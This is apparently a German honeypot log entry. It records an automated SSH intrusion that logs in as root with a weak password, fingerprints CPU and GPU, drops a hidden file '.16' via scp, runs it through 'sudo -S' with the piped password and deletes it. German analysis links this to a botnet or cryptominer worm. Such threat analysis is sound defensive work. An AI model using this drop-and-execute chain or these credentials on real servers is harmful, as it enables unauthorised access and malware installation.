02.10.2026, 22:15 UTC · 17 Befehle · über ssh · Deutschland · 16× wiederholt
user='root' pass='!root' root@srv01:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH root@srv01:~$ uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo "") root@srv01:~$ arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo "") root@srv01:~$ uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null) root@srv01:~$ cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) root@srv01:~$ gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ) root@srv01:~$ echo "UNAME:$uname" UNAME:Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) docker-01 x86_64 root@srv01:~$ echo "ARCH:$arch" ARCH:x86_64 root@srv01:~$ echo "UPTIME:$uptime" UPTIME:3110400.12 3456000.45 root@srv01:~$ echo "CPUS:$cpus" CPUS:16 root@srv01:~$ echo "GPU:$gpu_info" GPU: root@srv01:~$ scp -qt "/dev/shm/.16" root@srv01:~$ scp -qt "/var/tmp/.16" root@srv01:~$ echo '!root' | sudo -S sh -c 'chmod +x '\''/.16'\''' || echo '!root' | sudo -S chmod +x '/.16' || sh -c 'chmod +x '\''/.16'\''' || chmod +x '/.16' chmod: cannot access '/.16': No such file or directory !root !root root@srv01:~$ echo '!root' | sudo -S sh -c ''\''/.16'\''' || echo '!root' | sudo -S '/.16' || sh -c ''\''/.16'\''' || '/.16' bash: /.16: No such file or directory !root !root root@srv01:~$ echo '!root' | sudo -S sh -c 'rm -rf '\''/.16'\''' || echo '!root' | sudo -S rm -rf '/.16' || sh -c 'rm -rf '\''/.16'\''' || rm -rf '/.16' rm: cannot remove '/.16': No such file or directory !root !root root@srv01:~$ echo '!root' | sudo -S sh -c '' || echo '!root' | sudo -S || sh -c '' || bash: sudo: command not found !root !root
Der Angreifer meldete sich mit Standardzugangsdaten als Root an und führte eine Reihe von Systemabfragen durch, um die Hardwarekonfiguration zu ermitteln. Anschließend versuchte er, eine versteckte Datei namens .16 in temporäre Verzeichnisse zu kopieren und diese ausführbar zu machen. Nach dem Scheitern der Ausführung wegen fehlender Dateien wurden die Aufräumkommandos ausgeführt, um Spuren zu verwischen.
Die Kommandos uname, nproc und lspci sammeln technische Daten wie Betriebssystemversion, CPU-Architektur und Grafikkarteninformationen, wobei busybox als Fallback für minimale Systeme dient. Der Befehl scp -qt dient dem stillen Empfang von Dateien über das Secure Copy Protocol in die Pfade /dev/shm und /var/tmp. Die sudo -S Aufrufe versuchen, die empfangene Datei .16 ausführbar zu machen und zu starten, wobei das Passwort über die Standardeingabe nachgereicht wird. Das rm -rf Kommando soll die Datei nach dem Versuch löschen, um forensische Spuren zu beseitigen.
Das Vorgehen deutet auf die Installation eines Botnet-Agents oder eines Kryptominers hin, da die Abfrage von CPU-Kernen und GPU-Informationen typisch für die Bewertung der Mining-Leistung ist. Das Kopieren in versteckte Dateien und das anschließende Löschen sind klassische Tarnmechanismen, um die Persistenz zu sichern oder die Analyse zu erschweren.
Dieses Muster ist extrem verbreitet und stammt oft aus automatisierten Skripten, die massenhaft SSH-Server mit schwachen Passwörtern scannen. Die hohe Wiederholungsrate und die generische Payload-Struktur deuten auf einen bekannten, weitverbreiteten Botnet-Wurm hin.